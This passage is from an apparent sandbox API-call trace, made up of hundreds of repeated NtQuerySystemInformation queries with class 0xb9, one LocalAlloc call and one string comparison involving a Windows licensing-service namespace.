SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd10, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcb0, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcb0, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x28, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x48, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x48, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x48, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.523] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x2026d7d07d0 [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x58, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc40, Length=0x28, ResultLength=0x0) [0233.536] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x58, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x58, ResultLength=0x0) [0233.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x58, ResultLength=0x0) [0233.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x28, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x28, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x28, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x28, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x28, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x28, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x20, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x20, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x20, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x20, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db20, Length=0x20, ResultLength=0x0) [0233.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da40, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da40, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da40, Length=0x20, ResultLength=0x0) [0233.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x20, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x20, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.560] 